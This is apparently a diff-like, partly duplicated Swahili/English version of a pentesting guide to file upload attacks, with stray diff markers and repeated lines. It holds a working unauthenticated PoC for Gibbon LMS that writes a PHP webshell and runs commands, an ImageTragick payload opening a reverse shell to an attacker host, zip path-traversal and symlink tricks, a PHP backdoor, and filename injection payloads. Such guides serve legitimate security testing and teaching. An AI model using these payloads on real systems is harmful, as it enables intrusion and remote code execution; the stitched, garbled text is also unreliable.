Urefu wa **jina la faili** katika **linux** ni **255**, hata hivyo, **wget** inakata majina ya faili hadi **236** herufi. Unaweza **kupakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili litatoka kwenye **ukaguzi** (kwa mfano hapa **".gif"** ni extension halali) lakini `wget` itabadilisha jina la faili kuwa **"A"\*232+".php"**.
- Endpoint: `/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php`
- Njia: POST
- Vigezo vinavyohitajika:
- `img`: data-URI-like string: `[mime];[name],[base64]` (server inapuuza type/name, inafanya base64-decode sehemu ya mwisho)
- `path`: jina la faili linalolengwa kulingana na Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: thamani yoyote isiyo tupu inakubaliwa (e.g., `0000000001`)
Minimal PoC ya kuandika na kusoma tena faili:
```bash
# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK
# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'
# Verify write
curl http://target/Gibbon-LMS/poc.php
```
Pakia webshell mdogo na endesha amri:
```bash
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
```
Vidokezo:
- Mshughuliki hufanya `base64_decode($_POST["img"])` baada ya kugawanya kwa `;` na `,`, kisha inaandika bytes kwa `$absolutePath . '/' . $_POST['path']` bila kuthibitisha extension/type.
- Msimbo utakaotokana unaendesha kama mtumiaji wa web service (kwa mfano, XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
## **wget File Upload/SSRF Trick**
Katika baadhi ya matukio unaweza kugundua kuwa seva inatumia **`wget`** kupakua **faili** na unaweza **kuonyesha** **URL**. Katika hali hizi, msimbo unaweza kuwa unakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa tu zitakazopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuvukiwa.**\
Urefu wa **maximum** wa **filename** katika **linux** ni **255**, hata hivyo, **wget** hupunguza majina ya faili hadi **236** characters. Unaweza **download a file called "A"*232+".php"+".gif"**, jina hili la faili lita**bypass** **check** (kama katika mfano huu **".gif"** ni **valid** extension) lakini `wget` itanipa jina jipya la faili kuwa **"A"*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@ -187,35 +226,35 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
Kumbuka kwamba **chaguo jingine** unaloweza kufikiriwa nalo kuzunguka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itaingia bila kukaguliwa kisha wget itapakua faili iliyorejeshwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa na **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejeshwa kwa jina la faili lililoonyeshwa kwenye URL ya asili**.
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
## Zana
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kutumia vulnerabilities, kuhakikisha tathmini ya kina ya web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mifumo ya kupakia faili. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kutambua na kutumia udhaifu, ikihakikisha tathmini kamili za web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au njia kama hiyo kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda muundo wa `_FILES`. Kutokana na kutokamilika na kukatwa kwa tabia ya `snprintf()`, upload moja iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index upande wa server, ikachanganya mantiki inayodhani muundo thabiti (kwa mfano, kuitenda kama multi-file upload na kuchukua matawi hatarishi). Ingawa ni niche leo, muundo huu wa “index corruption” mara kwa mara hujitokeza tena katika CTFs na codebases za zamani.
Baadhi ya upload handlers za zamani ambazo zinatumia `snprintf()` au sawa ili kujenga arrays za faili nyingi kutoka kwa upload ya faili moja zinaweza kudanganywa kujifanya zinafanya forge ya muundo wa `_FILES`. Kutokana na kutokukamilika na kukatwa kwa tabia ya `snprintf()`, upload iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index kwenye upande wa server, ikachanganya mantiki inayodhani muundo thabiti (mfano, kuitaza kama upload ya faili nyingi na kuchukua matawi hatarishi). Ingawa ni nadra leo, muundo huu wa “index corruption” mara kwa mara huibuka tena katika CTFs na codebases za zamani.
## Kutoka File upload hadi vulnerabilities nyingine
## From File upload to other vulnerabilities
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- Weka **filename** kuwa `../../../tmp/lol.png` na jaribu kupata **path traversal**
- Weka **filename** kuwa `sleep(10)-- -.jpg` na huenda ukaweza kupata **SQL injection**
- Weka **filename** kuwa `<svg onload=alert(document.domain)>` ili kupata XSS
- Weka **filename** kuwa `; sleep 10;` ili kujaribu command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- Jaribu **different svg payloads** kutoka [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- Ikiwa unaweza **kuonyesha web server ichukue picha kutoka kwa URL** unaweza kujaribu kubadilisha kwa kutumia [SSRF](../ssrf-server-side-request-forgery/index.html). Ikiwa picha hii itahifadhiwa kwenye tovuti **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
- PDF zilizotengenezwa kwa njia maalumu kwa XSS: Ukurasa wa [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS kwa mujibu wa maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **kizuizi cha ukubwa** wakati wa kupakia faili
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Hapa kuna orodha ya top 10 ya mambo unayoweza kufanya kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
@ -240,39 +279,40 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejea kwa [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa filetypes nyingine.
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za faili.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP itakayofinyangwa ndani ya server, unaweza kufanya mambo 2:
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya vitu 2:
### Symlink
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
Pakia archive lenye soft links kuelekea kwa faili nyingine, kisha kwa kufikia faili zilizofunguliwa utaweza kufikia faili zilizohusishwa:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Decompress katika folda tofauti
### Kufungua (decompress) katika folda tofauti
Uundaji usiotarajiwa wa faili kwenye saraka wakati wa decompress ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu unaweza kulinda dhidi ya utekelezaji wa amri za OS-level kupitia upakiaji wa faili zenye madhara, msaada wa compression wa kihierarkia na uwezo wa directory traversal wa muundo wa archive wa ZIP unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoka katika saraka za upakiaji salama kwa kudhibiti utendaji wa decompression wa programu inayolengwa.
Uundaji wa mafaili yasiyotarajiwa ndani ya directories wakati wa decompression ni tatizo kubwa. Ingawa awali mtu angefikiri kwamba mpangilio huu unaweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa hierarchical compression na uwezo wa directory traversal wa fomati ya ZIP unaweza kutumika vibaya. Hii inawawezesha attackers kupita vikwazo na kutoroka kutoka kwa secure upload directories kwa kudanganya decompression functionality ya application iliyolengwa.
Exploit iliyotautomatiiza ya kutengeneza faili kama hizi inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama inavyoonyeshwa:
Automated exploit ya kutengeneza mafaili kama hayo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa utekelezaji wake.
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa kuendesha.
Chini kuna mfano wa Python code unaotumika kuunda zip file ya hatari:
Hapo chini kuna mfano wa Python code unaotumika kuunda faili ya zip yenye madhara:
```python
#!/usr/bin/python
import zipfile
from io import BytesIO
def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
@ -285,11 +325,11 @@ zip.close()
create_zip()
```
**Kunyanyasa compression kwa file spraying**
**Kutumia vibaya compression kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Kuunda PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
```php
<?php
@ -299,65 +339,68 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikiwa na faili hizi.
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaumbwa na archive ya zip inajengwa ikijumuisha faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye saraka.
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.
```bash
:set modifiable
:%s/xxA/..\//g
:%s/xxA/../g
:x!
```
## ImageTragic
Pakia yaliyomo haya kwa extension ya image ili ku-exploit udhaifu **(ImageMagick , 7.0.1-1)** (form the [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (tazama [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP Shell kwenye PNG
## Embedding PHP Shell on PNG
Kuingiza PHP shell katika chunk ya IDAT ya faili ya PNG kunaweza kuepuka kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funguo za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani hutumika mara kwa mara kwa kupima upya na resampling picha, kwa mtiririko huo. Uwezo wa PHP shell iliyowekwa ndani ya kukaa bila kuathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Kuingiza PHP shell ndani ya chunk ya IDAT ya faili ya PNG kunaweza kuzuia kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funsioni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kwa kawaida zinatumiwa kwa resizing na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyojazwa kubaki isiyoathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Uchunguzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yake yanayowezekana, umepangwa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Taarifa zaidi: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Polyglot Files
Polyglot files hutumika kama chombo cha kipekee katika cybersecurity, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), muunganiko ambao hufanya kazi kama GIF na pia kama archive ya RAR. Faili kama hizi hazikikwi kwa muunganisho huo pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Polyglot files zinatumika kama zana ya kipekee katika usalama wa mtandao, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), nyongeza inayofanya kazi wakati huo huo kama GIF na archive ya RAR. Faili hizi hazizuiliki kwa jozi hii tu; mchanganyiko kama GIF na JS au PPT na JS pia inawezekana.
Manufaa kuu ya polyglot files yako katika uwezo wao wa kukwepa hatua za usalama ambazo hupitia faili kulingana na aina. Katika matumizi ya kawaida, programu nyingi huruhusu aina maalum za faili tu kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuendana na vigezo vya muundo vya aina nyingi za faili, inaweza kuzipitia vikwazo hivi kwa kimyakimya.
Faida kuu ya polyglot files iko katika uwezo wao wa kuepuka viwango vya usalama vinavyoscreen faili kulingana na aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa utupu vikwazo hivi kwa siri.
Licha ya ufanifu wao, polyglots hukutana na mipaka. Kwa mfano, ingawa polyglot inaweza kwa wakati mmoja kuwa PHAR file (PHp ARchive) na JPEG, mafanikio ya upakiaji wake yanaweza kutegemea sera za jukwaa kuhusu extensions za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, muundo wa pande mbili wa polyglot inaweza isitoshe kuhakikisha upakiaji wake.
Licha ya ufanisi wao, polyglots hukutana na vizingiti. Kwa mfano, wakati polyglot inaweza kuwa PHAR file (PHp ARchive) na JPEG kwa pamoja, mafanikio ya upload yake yanaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazokubaliwa, uraia wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha upload yake.
Taarifa zaidi: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Kupakia JSON halali kana kwamba ni PDF
### Upload valid JSONs like if it was PDF
Jinsi ya kuepuka utambuzi wa aina za faili kwa kupakia faili ya JSON halali hata kama haikuruhusiwa kwa kuigiza kuwa ni faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
Jinsi ya kuepuka detection za aina ya faili kwa kupakia faili halali ya JSON hata kama haikuruhusiwa kwa kuiga faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: Iwapo tu magic bytes za `%PDF` ziko katika bytes za kwanza 1024 basi inachukuliwa kuwa halali (angalia mfano kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF bandia ndani ya field ya JSON ili library ithink ni pdf (angalia mfano kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa zaidi ya hiyo ili isiweze kuchambua maudhui kama json, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF
- **`mmmagic` library**: Iwapo tu magic bytes `%PDF` ziko katika 1024 ya kwanza, inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Weka muundo bandia wa PDF ndani ya field ya JSON ili library ianze kuifikiria kuwa ni pdf (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa kuliko hiyo ili isiweze kuchambua yaliyomo kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani kuwa ni PDF
## Marejeleo
## Marejeo
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://github.com/modzero/mod0BurpUploadScanner
- https://github.com/almandin/fuxploider
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
- https://blog.doyensec.com/2025/01/09/cspt-file-upload.html
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
- [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
- [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
- [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
- [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- [usd HeroLab Gibbon LMS arbitrary file write (CVE-2023-45878)](https://herolab.usd.de/security-advisories/usd-2023-0025/)
- [NVD CVE-2023-45878](https://nvd.nist.gov/vuln/detail/CVE-2023-45878)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)